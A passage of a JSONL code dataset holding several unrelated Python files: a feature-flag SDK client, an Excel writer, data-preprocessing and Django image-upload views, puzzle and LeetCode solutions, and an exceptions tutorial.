user_value == \"true\"\n\n def __meets_constraint(self, user_value, param_exists, constraint):\n operator = constraint[\"operator\"]\n if param_exists is False:\n return False\n constraint_value = constraint[\"values\"]\n if \"userParamType\" in constraint and constraint[\"userParamType\"] == \"number\":\n user_value = self.__parse_number(user_value)\n constraint_value = self.__parse_number(constraint_value)\n elif \"userParamType\" in constraint and constraint[\"userParamType\"] == \"boolean\":\n user_value = self.__parse_bool(user_value)\n constraint_value = self.__parse_bool(constraint_value)\n elif \"userParamType\" in constraint and constraint[\"userParamType\"] == \"semver\":\n user_value = str(user_value)\n user_value = semver.Version.parse(user_value)\n constraint_value = semver.Version.parse(constraint_value)\n else:\n user_value = str(user_value)\n\n if operator == \"in\":\n list_values = constraint_value.split(\",\")\n return user_value in list_values\n elif operator == \"nin\":\n list_values = constraint_value.split(\",\")\n return user_value not in list_values\n elif operator == \"equals\":\n return user_value == constraint_value\n elif operator == \"doesNotEqual\":\n return user_value != constraint_value\n elif operator == \"gt\":\n return user_value > constraint_value\n elif operator == \"gte\":\n return user_value >= constraint_value\n elif operator == \"lt\":\n return user_value < constraint_value\n elif operator == \"lte\":\n return user_value <= constraint_value\n elif operator == \"contains\":\n return user_value in constraint_value\n elif operator == \"doesNotContain\":\n return user_value not in constraint_value\n else:\n return False\n\n def __send_events(self, event_options: Dict):\n event_options[\"tags\"] = json.dumps(event_options[\"tags\"])\n requests.post(self.base_url + \"/analytics\", json=event_options, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n\n def __schedule_reconnect(self):\n scheduled_time = 1 * self.__retry_count * 2\n if scheduled_time == 0:\n scheduled_time = 1\n elif scheduled_time >= 64:\n scheduled_time = 64\n scheduled_time = scheduled_time - \\\n math.trunc(random() * 0.3 * scheduled_time)\n self.__retry_count = self.__retry_count + 1\n logger.info(\n \"Scheduling reconnect to Molasses in {scheduled_time} Seconds\".format(scheduled_time=scheduled_time))\n time.sleep(scheduled_time)\n self.__start_stream()\n\n def __start_stream(self):\n try:\n response = requests.get(self.base_url + \"/event-stream\", params={}, stream=True, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n response.raise_for_status()\n client = sseclient.SSEClient(response)\n for event in client.events():\n data = json.loads(event.data)\n if \"data\" in data:\n d = data.get(\"data\")\n if \"features\" in d:\n features = d.get(\"features\")\n for feature in features:\n self.__cache[feature[\"key\"]] = feature\n self.__initialized = True\n logger.info(\"Initiated and connected\")\n except requests.ConnectionError:\n logger.error(\"Failed to connect with Molasses\")\n self.__schedule_reconnect()\n except Exception:\n logger.error(\"Connection lost with Molasses\")\n self.__schedule_reconnect()\n\n def __fetch_features(self):\n response = requests.get(self.base_url + \"/features\", params={}, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n if response.status_code == 200:\n data = response.json()\n if \"data\" in data:\n d = data.get(\"data\")\n if \"features\" in d:\n features = d.get(\"features\")\n for feature in features:\n self.__cache[feature[\"key\"]] = feature\n self.__initialized = True\n else:\n logger.error(\"Molasses - %s %s\",\n response.status_code, response.text, exc_info=1)\n","repo_name":"molassesapp/molasses_python","sub_path":"molasses/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22718272198","text":"from xlsxwriter.workbook import Workbook\nfrom collections import OrderedDict\nimport common\nimport datetime\n\n\nclass XlsFactory:\n\n @staticmethod\n def create(input):\n filename = common.pop_dict(input, \"filename\")\n workbook = Workbook(filename)\n formats = InputFactory.init_formats(input, workbook)\n for sheet in input['sheets']:\n XlsFactory.process_sheet(workbook, sheet, formats)\n workbook.close()\n return filename\n\n @staticmethod\n def process_sheet(workbook, sheet, formats):\n for sheet_name, sheet_data in sheet.items():\n sorted_dict = OrderedDict(\n sorted(sheet_data.items(), key=lambda t: t[0])\n )\n worksheet = workbook.add_worksheet(sheet_name)\n XlsFactory.add_cells(worksheet, sorted_dict, formats)\n\n @staticmethod\n def add_cells(sheet, sorted_dict, formats):\n conditional_formats = common.pop_dict(sorted_dict, \"conditional_formats\")\n column_sizes = common.pop_dict(sorted_dict, \"column_size\")\n\n for cell_pos, cell_value in sorted_dict.items():\n new_value = InputFactory.get_args(cell_value, formats)\n new_key = InputFactory.parse_cell_position(cell_pos)\n args = new_key + new_value\n if isinstance(args[0], str) and \":\" in args[0]:\n sheet.merge_range(*args)\n else:\n sheet.write(*args)\n\n XlsFactory.add_conditional_formats(conditional_formats, formats, sheet)\n XlsFactory.resize_columns(column_sizes, sheet)\n\n\n @staticmethod\n def add_conditional_formats(conditional_formats, formats, worksheet):\n for cells, criteria in conditional_formats.items():\n criteria[\"format\"] = formats.get(criteria.get(\"format\"))\n worksheet.conditional_format(cells, criteria)\n\n @staticmethod\n def resize_columns(column_sizes, worksheet):\n for k, v in column_sizes.items():\n worksheet.set_column(k, v)\n\n\nclass InputFactory:\n @staticmethod\n def init_formats(input, workbook):\n return_dict = {}\n for k, v in common.pop_dict(input, \"formats\").items():\n return_dict[k] = workbook.add_format(v)\n return return_dict\n\n @staticmethod\n def get_args(value, formats):\n def is_dict():\n key = \"value\" if \"value\" in value else \"date\"\n if \"date\" == key:\n nums = [int(n) for n in value[key].split(\"-\")]\n date = datetime.date(nums[0], nums[1], nums[2])\n return date, formats[value['format']]\n else:\n return value['value'], formats[value['format']]\n\n def is_str():\n return (value,)\n\n functions = {dict: is_dict, str: is_str}\n return functions[value.__class__]()\n\n @staticmethod\n def parse_cell_position(k):\n if \",\" in k:\n return tuple(int(n) for n in k.split(\",\"))\n else:\n return (k,)","repo_name":"dxe4/jsonTOxls","sub_path":"xls_process.py","file_name":"xls_process.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"35432675643","text":"import sys\n\nimport operations\nimport storage\nimport ui\n\n\ndef choose_options_menu():\n user_choice = input('Your choice: ')\n if user_choice == 'd':\n operations.detect_broken_record(storage.open_wav_files_from())\n elif user_choice == 'g':\n operations.save_waveforms_from(storage.open_wav_files_from())\n elif user_choice == 'q':\n sys.exit()\n else:\n ui.display_message(\"There isn't such option\")\n\n\ndef display_menu():\n menu_commands = ['detect broken records',\n 'generate waveform png',\n 'quit']\n ui.display_program_menu(menu_commands)\n\n\ndef main():\n while True:\n display_menu()\n choose_options_menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"2RMalinowski/audio_analysis","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36858623038","text":"nfile = open('data/day02.txt', 'r')\nnbl = nfile.read().split('\\n')\n\nvalid = 0\nfor line in nbl:\n\ttab = line.split(':')\n\t(nb, letter) = tab[0].split(' ')\n\t(mina, maxa) = nb.split('-')\n\ttext = tab[1].replace(' ', '')\n\tvalidate = False\n\tif(text[int(mina) - 1] == letter):\n\t\tvalidate = True\n\tif(text[int(maxa) - 1] == letter):\n\t\tif validate:\n\t\t\tvalidate = False\n\t\telse:\n\t\t\tvalidate = True\n\tif validate:\n\t\tvalid +=1\nprint(valid)","repo_name":"AFeuillet/CodingGames","sub_path":"AOC/2020/day02b.py","file_name":"day02b.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34300129191","text":"név= input('Mi az ős neve? ')\nbogyók=int(input('Hány Bogyója van? '))\nif bogyók<10:\n minősités=\"zsenge\"\nelif bogyók>20:\n minősités=\"nagy koponya\"\nelse:\n minősités='gyűjtögető'\n\nprint(f'{név} egy {minősités}.')\n","repo_name":"Tucsok2/Python","sub_path":"bogyó.py","file_name":"bogyó.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"42925224139","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nfrom sklearn.preprocessing import OneHotEncoder, OrdinalEncoder, StandardScaler, MinMaxScaler\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.decomposition import PCA\r\nfrom yellowbrick.cluster import KElbowVisualizer\r\nfrom yellowbrick.cluster import SilhouetteVisualizer\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import DBSCAN\r\nfrom sklearn.mixture import GaussianMixture\r\nimport scipy.cluster.hierarchy as shc\r\nimport time\r\n#from kmodes.kprototypes import KPrototypes\r\n\r\n# Load data\r\ndf = pd.read_csv('heartdatak.csv',sep=',')\r\nprint(df.head())\r\n\r\n#check values in each column to know missing values\r\nfor column in df:\r\n print(\"unique values in\\\"\",column,\"\\\"are:\")\r\n print(df[column].value_counts())\r\n\r\n#drop thal, slope, ca as they have majow missing values\r\n#drop class as it is irrelevant for clustering\r\n\r\ndf.drop(columns=['class','ca', 'thal', 'slope'],inplace=True)\r\n\r\n\r\n#replace ? with NaN\r\ndf.fbs = pd.to_numeric(df.fbs, errors='coerce')\r\ndf.oldpeak = pd.to_numeric(df.oldpeak, errors='coerce')\r\ndf.exang = pd.to_numeric(df.exang, errors='coerce')\r\ndf.thalach = pd.to_numeric(df.thalach, errors='coerce')\r\ndf.chol = pd.to_numeric(df.chol, errors='coerce')\r\ndf.trestbps = pd.to_numeric(df.trestbps, errors='coerce')\r\ndf.restecg = pd.to_numeric(df.restecg, errors='coerce')\r\n\r\n#fill missing values with mean\r\ndf.fbs.fillna(df.fbs.mean(), inplace=True)\r\ndf.oldpeak.fillna(df.oldpeak.mean(), inplace=True)\r\ndf.exang.fillna(df.exang.mean(), inplace=True)\r\ndf.thalach.fillna(df.thalach.mean(), inplace=True)\r\ndf.chol.fillna(df.chol.mean(), inplace=True)\r\ndf.trestbps.fillna(df.trestbps.mean(), inplace=True)\r\ndf.restecg.fillna(df.restecg.mean(), inplace=True)\r\n\r\n\r\n#convert datatype to integer\r\ndf['fbs'] = df['fbs'].astype('int')\r\ndf['trestbps'] = df['trestbps'].astype('int')\r\ndf['oldpeak'] = df['oldpeak'].astype('int')\r\ndf['exang'] = df['exang'].astype('int')\r\ndf['thalach'] = df['thalach'].astype('int')\r\ndf['chol'] = df['chol'].astype('int')\r\ndf['restecg'] = df['restecg'].astype('int')\r\n\r\nfor column in df:\r\n print(\"unique values in\\\"\",column,\"\\\"are:\")\r\n print(df[column].value_counts())\r\n \r\n#EDA\r\ndf.describe(include='all') \r\ndf.isna().sum()\r\ndf.info()\r\n\r\n#Correlation\r\nprint(df.corr())\r\nplt.matshow(df.corr())\r\nplt.show()\r\n\r\n#drawing boxplot to detect outliers\r\nsns.boxplot(x=\"variable\", y=\"value\", data=pd.melt(df))\r\nplt.title('BoxPlot of Data Columns')\r\nplt.show()\r\n\r\nfig, axes = plt.subplots(ncols=len(df.columns), figsize=(30,15))\r\nfor ax, col in zip(axes, df.columns):\r\n sns.distplot(df[col], ax=ax)\r\n plt.tight_layout() \r\nplt.show()\r\n\r\n#convert categorical variabled with one hot encoding\r\nprint(df.keys())\r\ndf = pd.get_dummies(df, columns=[\"gender\",\"cp\",\"fbs\",\"restecg\",\"exang\"])\r\nprint(\"converted categorical data:\\n\",df)\r\nprint(df.keys())\r\n\r\n#scale numerical data\r\n# Using DataFrame.filter() method.\r\ndf_continuous = df.filter(['age', 'trestbps', 'chol','thalach', 'oldpeak'], axis=1)\r\n\r\nscale_df=MinMaxScaler().fit_transform(df_continuous)\r\nprint(\"scaled data \\n:\",scale_df)\r\ndf.drop(columns=['age', 'trestbps', 'chol','thalach', 'oldpeak'],inplace=True)\r\nprint(\"Dataframe: \\n\",df)\r\npreprocessed_df = pd.DataFrame(scale_df,columns= df_continuous.columns )\r\npreprocessed_df = pd.concat([preprocessed_df,df],axis=1)\r\nprint(\"Preprocessed Data: \\n\",preprocessed_df)\r\npreprocessed_df.isna().sum()\r\n# preprocessed_df = preprocessed_df.fillna(0)\r\nprint(df.keys())\r\n\r\n\r\n#drop irrelevant columns\r\npreprocessed_df.drop(columns=[ 'gender_0', 'gender_1'],inplace=True)\r\nprint(\"Data ready for clustering:\\n\",preprocessed_df)\r\nprint(preprocessed_df.keys())\r\npreprocessed_df.to_csv(\"Preprocessed_Data.csv\")\r\n","repo_name":"SystemHeuristics/Clustering","sub_path":"Data_preprocessing.py","file_name":"Data_preprocessing.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12863145279","text":"import base64\nimport mimetypes\nimport os\nfrom datetime import datetime\nimport base64\nimport io\nimport PIL.Image as Image\nimport requests\nfrom django.contrib import messages\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http.response import StreamingHttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .camera import VideoCamera\nfrom .forms import TourismForm\nfrom .ml_model import logic_layer\nfrom .models import History, NumberPlateHistory\n\n# Create your views here.\nres = None\n\n\ndef index(request):\n return render(request=request,\n template_name='main/index1.html')\n\n\ndef predict(request):\n return render(request=request,\n template_name='main/predict.html', context={\"tourist\": res})\n\n\ndef photo_coloring(request):\n try:\n his_prods = []\n for i in History.objects.all():\n his_prods.append(i)\n if len(his_prods) > 14:\n ten = his_prods[-15:]\n return render(request=request, template_name='main/photo_coloring.html',\n context={'his_prod': ten})\n return render(request=request, template_name='main/photo_coloring.html',\n context={'his_prod': his_prods})\n except:\n messages.info(request, \"Recent Post Not Found\")\n return render(request=request, template_name='main/photo_coloring.html')\n\n\ndef detail(request, his_id):\n try:\n product = History.objects.filter(his_id=his_id).first()\n his_prods = []\n for i in History.objects.all():\n his_prods.append(i)\n if len(his_prods) > 9:\n ten = his_prods[-10:]\n context = {'product': product, 'his_prod': ten}\n\n return render(request, \"main/detail.html\", context)\n context = {'product': product, 'his_prod': his_prods}\n return render(request, \"main/detail.html\", context)\n\n except:\n messages.info(request, \"Details Page data not found\")\n context = {'product': product, 'his_prod': his_prods}\n return render(request, \"main/detail.html\", context)\n\n\ndef upload(request):\n try:\n if request.method == 'POST':\n myfile = request.FILES.get(\"myfile\")\n mimetypes.init()\n\n mimestart = mimetypes.guess_type(myfile.name)[0]\n\n if mimestart != None:\n mimestart = mimestart.split('/')[0]\n\n if mimestart in ['video', 'image']:\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_as_input/' + timestr)\n filename = fs.save(myfile.name, myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_as_input/\" + timestr, filename)\n # file_output = os.path.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5001/process'\n files = {'file': open(file_input, 'rb')}\n\n try:\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n # Picture_request = requests.post(url, files=files)\n import base64\n file = open(\"media/image_as_output/\" + timestr + filename, \"wb\")\n file.write(Picture_request.content)\n file.close()\n file_loc1 = \"media/image_as_output/\" + timestr + filename\n\n history = History.objects.create(name=filename, image_input=file_input,\n image_output=file_loc1)\n history.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n return render(request=request, template_name='main/upload.html',\n context={'uploaded_file': uploaded_file\n })\n else:\n messages.info(request, \"API is not Connected\")\n return render(request=request,\n template_name='main/upload.html')\n except:\n messages.info(request, \"API is not Connected\")\n return render(request=request,\n template_name='main/upload.html')\n else:\n messages.info(request, \"please upload video and image data\")\n return render(request=request, template_name='main/upload.html',\n )\n else:\n messages.info(request, \"Invalid data\")\n return render(request=request, template_name='main/upload.html',\n )\n\n else:\n return render(request=request,\n template_name='main/upload.html')\n except:\n messages.info(request, \" Please Check upload data \")\n return render(request=request,\n template_name='main/upload.html')\n\n\ndef number_plate(request):\n try:\n num_his_prods = []\n for i in NumberPlateHistory.objects.all():\n num_his_prods.append(i)\n return render(request=request, template_name='main/number_plate.html',\n context={'num_his_prods': num_his_prods})\n\n except:\n messages.info(request, \"Recent Post data is not found\")\n\n\ndef detail_for_number_plate(request, his_id):\n try:\n product_for_number_plate = NumberPlateHistory.objects.filter(num_his_id=his_id).first()\n number_his_prods = []\n for i in NumberPlateHistory.objects.all():\n number_his_prods.append(i)\n if len(number_his_prods) > 9:\n ten = number_his_prods[-10:]\n context = {'product_for_number_plate': product_for_number_plate, 'number_his_prods': ten}\n return render(request, \"main/detail_for_number_plate.html\", context)\n context = {'product_for_number_plate': product_for_number_plate, 'number_his_prods': number_his_prods}\n return render(request, \"main/detail_for_number_plate.html\", context)\n except:\n messages.info(request, \"number detail page not found\")\n return render(request, \"main/detail_for_number_plate\")\n\n\ndef upload_number_plate(request):\n try:\n if request.method == 'POST':\n myfile = request.FILES.get(\"myfile\")\n mimetypes.init()\n mimestart = mimetypes.guess_type(myfile.name)[0]\n if mimestart != None:\n mimestart = mimestart.split('/')[0]\n\n if mimestart in ['video', 'image']:\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_input_number_plate/' + timestr)\n filename = fs.save(myfile.name, myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_input_number_plate/\" + timestr, filename)\n # file_output = os.pa`````````````````` h7th.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5005/process'\n files = {'file': open(file_input, 'rb')}\n try:\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n output_data = Picture_request.json()\n number_plat = output_data[\"Number_plat\"]\n image_bytes = output_data[\"ImageBytes\"]\n number_plat1 = \"\".join(number_plat)\n import base64\n file = open(\"media/image_output_number_plate/\" + timestr + filename, \"wb\")\n b = base64.b64decode(image_bytes)\n img = Image.open(io.BytesIO(b))\n\n\n # file.write(image_bytes)\n # file.close()\n file_loc1 = \"media/image_output_number_plate/\" + timestr + filename\n img.save(file_loc1)\n\n number_plate = NumberPlateHistory.objects.create(num_name=filename,\n num_image_input=file_input,\n num_image_output=file_loc1)\n number_plate.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n return render(request=request, template_name='main/upload_number_plate.html',\n context={'uploaded_file': uploaded_file, 'number_plat': number_plat1})\n else:\n messages.info(request, \"API Response Not valid\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n except:\n messages.info(request, \"API is Not Connected\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n else:\n messages.info(request, \"Please Upload Image and Video Data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n else:\n messages.info(request, \"Invalid data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n else:\n messages.info(request, 'Number Plate Recognition started')\n return render(request=request,\n template_name='main/upload_number_plate.html')\n except:\n messages.info(request, \"Please Check Upload data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n\ndef gen(camera):\n while True:\n frame = camera.get_frame1()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n\ndef emotion_based_music(request):\n # his_prods = []\n # for i in History.objects.all():\n # his_prods.append(i)\n # if len(his_prods) > 9:\n # ten = his_prods[-10:]\n # return render(request=request, template_name='main/emotion_based_music.html',\n # context={'his_prod': ten})\n return render(request=request, template_name='main/emotion_based_music.html')\n\n\ndef upload_image_for_music(request):\n try:\n if request.method == 'POST':\n myfile = request.FILES.get(\"myfile\")\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_input_for_music/' + timestr)\n filename = fs.save(myfile.name, myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_input_for_music/\" + timestr, filename)\n # file_output = os.pa`````````````````` h7th.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5003/process'\n files = {'file': open(file_input, 'rb')}\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n music_out = Picture_request.json()\n image_byte_data = music_out[\"ImageBytes\"]\n recommended_songs = music_out[\"Songs\"]\n # y = json.loads(recommended_songs)\n\n import PIL.Image as Image\n import io\n b = base64.b64decode(image_byte_data)\n img = Image.open(io.BytesIO(b))\n img.save(open(\"media/image_output_for_music/\" + timestr + filename, \"wb\"))\n\n # file = open(\"media/image_output_for_music/\" + timestr + filename, \"wb\")\n # file.write(Picture_request.content)\n # file.close()\n file_loc1 = \"media/image_output_for_music/\" + timestr + filename\n\n # number_plate = NumberPlateHistory.objects.create(num_name=filename, num_image_input=file_input,\n # num_image_output=file_loc1)\n # number_plate.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n else:\n messages.info(request, \"API Not Connected\")\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n return render(request=request, template_name='main/music_image_upload.html',\n context={'uploaded_file': uploaded_file, 'recommended_songs': recommended_songs\n })\n\n else:\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n except:\n messages.info(request, \"Please Check Upload data\")\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n\ndef driver_drowsiness(request):\n return render(request=request,\n template_name='main/driver_drowsiness.html')\n\n\ndef video_feed(request):\n return StreamingHttpResponse(gen(VideoCamera()),\n content_type='multipart/x-mixed-replace; boundary=frame')\n\n\ndef bigsale(request):\n if request.method == 'POST':\n item_weight = float(request.POST['item_weight'])\n item_fat_content = float(request.POST['item_fat_content'])\n item_visibility = float(request.POST['item_visibility'])\n item_type = float(request.POST['item_type'])\n item_mrp = float(request.POST['item_mrp'])\n outlet_establishment_year = float(request.POST['outlet_establishment_year'])\n outlet_size = float(request.POST['outlet_size'])\n outlet_location_type = float(request.POST['outlet_location_type'])\n outlet_type = float(request.POST['outlet_type'])\n\n import requests\n res1 = requests.post(\"http://127.0.0.1:9457/predict\",\n data={'item_weight': item_weight, 'item_fat_content': item_fat_content,\n 'item_visibility': item_visibility,\n 'item_type': item_type, 'item_mrp': item_mrp,\n 'outlet_establishment_year': outlet_establishment_year,\n 'outlet_size': outlet_size, 'outlet_location_type': outlet_location_type,\n 'outlet_type': outlet_type})\n\n # print(res1)\n\n if res1.status_code == 200:\n res_sale1 = dict()\n res_sale1[\"pred\"] = res1.text\n res_sale = res_sale1[\"pred\"]\n\n # return render(request=request, template_name='main/photo_coloring.html',\n # context={'uploaded_file': uploaded_file})\n return render(request=request, template_name='main/bigsale.html', context={'res_sale': res_sale})\n\n return render(request=request, template_name='main/bigsale.html')\n\n # x = [quarter, mode, purpose, year, duration, country, spends, 0.38]\n # global res\n # res = logic_layer(x)\n # return redirect(\"/predict\")\n # else:\n # problem = form.errors.as_data()\n # # This section is used to handle invalid data\n # messages.error(request, list(list(problem.values())[0][0])[0])\n # form = TourismForm()\n # form = TourismForm()\n # return render(request=request, template_name='main/index2.html', context={\"form\": form})\n return render(request=request, template_name='main/bigsale.html')\n\n\ndef index2(request):\n if request.method == 'POST':\n form = TourismForm(request.POST)\n\n if form.is_valid():\n\n year = form.cleaned_data['year']\n duration = form.cleaned_data['duration']\n spends = form.cleaned_data['spends'] / 1000\n mode = int(form.cleaned_data['mode'])\n purpose = int(form.cleaned_data['purpose'])\n quarter = int(form.cleaned_data['quarter'])\n country = int(form.cleaned_data['country'])\n\n x = [quarter, mode, purpose, year, duration, country, spends, 0.38]\n global res\n res = logic_layer(x)\n return redirect(\"/predict\")\n else:\n problem = form.errors.as_data()\n # This section is used to handle invalid data \n messages.error(request, list(list(problem.values())[0][0])[0])\n form = TourismForm()\n form = TourismForm()\n return render(request=request, template_name='main/index2.html', context={\"form\": form})\n\n\ndef about(request):\n return render(request=request,\n template_name=\"main/about.html\")\n\n\ndef under_construction(request):\n messages.info(request, \"This page coming soon..\")\n return render(request=request,\n template_name=\"main/under_construction.html\")\n","repo_name":"abhishekshingadiya/AI-ML-demo","sub_path":"web-demo/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34705374999","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n stack = []\n path = path.split('/')\n\n for item in path:\n\n if item == '.' or item == '':\n continue\n elif item == '..':\n if stack:\n stack.pop()\n else:\n stack.append(item)\n\n res = '/'.join(stack)\n res = '/' + res\n return res\n","repo_name":"otthqs/Fun_Leetcode","sub_path":"Solutions/leetcode71_Simplify_Path.py","file_name":"leetcode71_Simplify_Path.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"12806926937","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUso básico de Excepción\n\"\"\"\nimport sys\n\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\"\"\"\nExcepciones Encadenadas\n\"\"\"\ntry:\n f = open(\"test.txt\", encoding='utf-8')\n # perform file operations\nexcept:\n print(\"Fallo al abrir\")\nfinally:\n try:\n f.close()\n except Exception as e:\n print(\"No se ha podido cerrar, porque no estaba abierto\")\n print(\"Error:\" + str(e))\n\"\"\"\nCaptura de excepción ValueError\n\"\"\"\nwhile True:\n try:\n n = input(\"Please enter an integer: \")\n n = int(n)\n break\n except ValueError:\n print(\"No valid integer! Please try again ...\")\n finally:\n print(\"Se ejecutaras siempre\")\nprint(\"Great, you successfully entered an integer!\")\n\"\"\"\nUso de Else \n\"\"\"\ntry:\n fh = open(\"testfile\", \"w\")\n fh.write(\"This is my test file for exception handling!!\")\nexcept IOError:\n print(\"Error: can\\'t find file or read data\")\nelse:\n print(\"Written content in the file successfully\")\n fh.close()\n\"\"\"\nUso de Finally\n\"\"\"\ntry:\n x = float(input(\"Your number: \"))\n print(x)\n inverse = 1.0 / x\n\nexcept ValueError:\n print(\"You should have given either an int or a float\")\nexcept ZeroDivisionError:\n print(\"Infinity\")\nfinally:\n print(\"There may or may not have been an exception.\")\n\n\"\"\"\nElevar una excepción\n\"\"\"\nimport sys\n\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\"\"\"\nAcceso a parámetros de excepción\n\"\"\"\ntry:\n raise Exception('spam', 'eggs')\nexcept Exception as inst:\n print(type(inst)) # the exception instance\n print(inst.args) # arguments stored in .args\n print(inst) # __str__ allows args to be printed directly,\n # but may be overridden in exception subclasses\n x, y = inst.args # unpack args\n print('x =', x)\n print('y =', y)\n\n\"\"\"\nExcepciones personalizadas\n\"\"\"\n\n\nclass B(Exception):\n pass\n\n\nclass C(B):\n pass\n\n\nclass D(C):\n pass\n\n\nfor cls in [B, C, D]:\n try:\n raise cls()\n except D:\n print(\"D\")\n except C:\n print(\"C\")\n except B:\n print(\"B\")\n\"\"\"\nExcepciones personalizadas más completo\n\"\"\"\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\n\nclass InputError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TransitionError(Error):\n \"\"\"Raised when an operation attempts a state transition that's not\n allowed.\n\n Attributes:\n previous -- state at beginning of transition\n next -- attempted new state\n message -- explanation of why the specific transition is not allowed\n \"\"\"\n\n def __init__(self, previous, next, message):\n self.previous = previous\n self.next = next\n self.message = message\n\n\nclass HTTPExcepcion(Exception):\n\n def __init__(self, mensaje='HTTPERROR: ', status='400', url='telecable.es'):\n self.mensaje = mensaje\n self.status = status\n self.url = url\n\n def __str__(self):\n return self.mensaje\n\n\ntry:\n raise HTTPExcepcion(\"HTTPERROR: el servidor no responde\", '500', \"cursosdedesarrollo.com\")\nexcept HTTPExcepcion as e:\n print(e)\n print(e.mensaje)\n print(e.url)\n print(e.status)\n","repo_name":"pepesan/ejemplos-python","sub_path":"excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25815818080","text":"\"\"\"\n- bottom up dynamic programming\n- dp[i] represents the number of arithmetic slices in range (k, i),\n - k is the starting index that chain starts\n - dp[0] = 0\n - dp[1] = 0\n - dp[2] = ?\n - dp[2] = 1 if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]\n - dp[3]\n - if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]\n - dp[3] = 1 (length: 3) + dp[2] (length: 3) + 1 (length: 4)\n - How can I add extra one\n- return sum(dp)\n\"\"\"\n\n\nfrom typing import List\n\n\n# class Solution:\n# def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n# dp = [0] * len(nums)\n#\n# for i in range(2, len(nums)):\n# if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]:\n# dp[i] = 1 + dp[i - 1] + dp[i]\n#\n# # 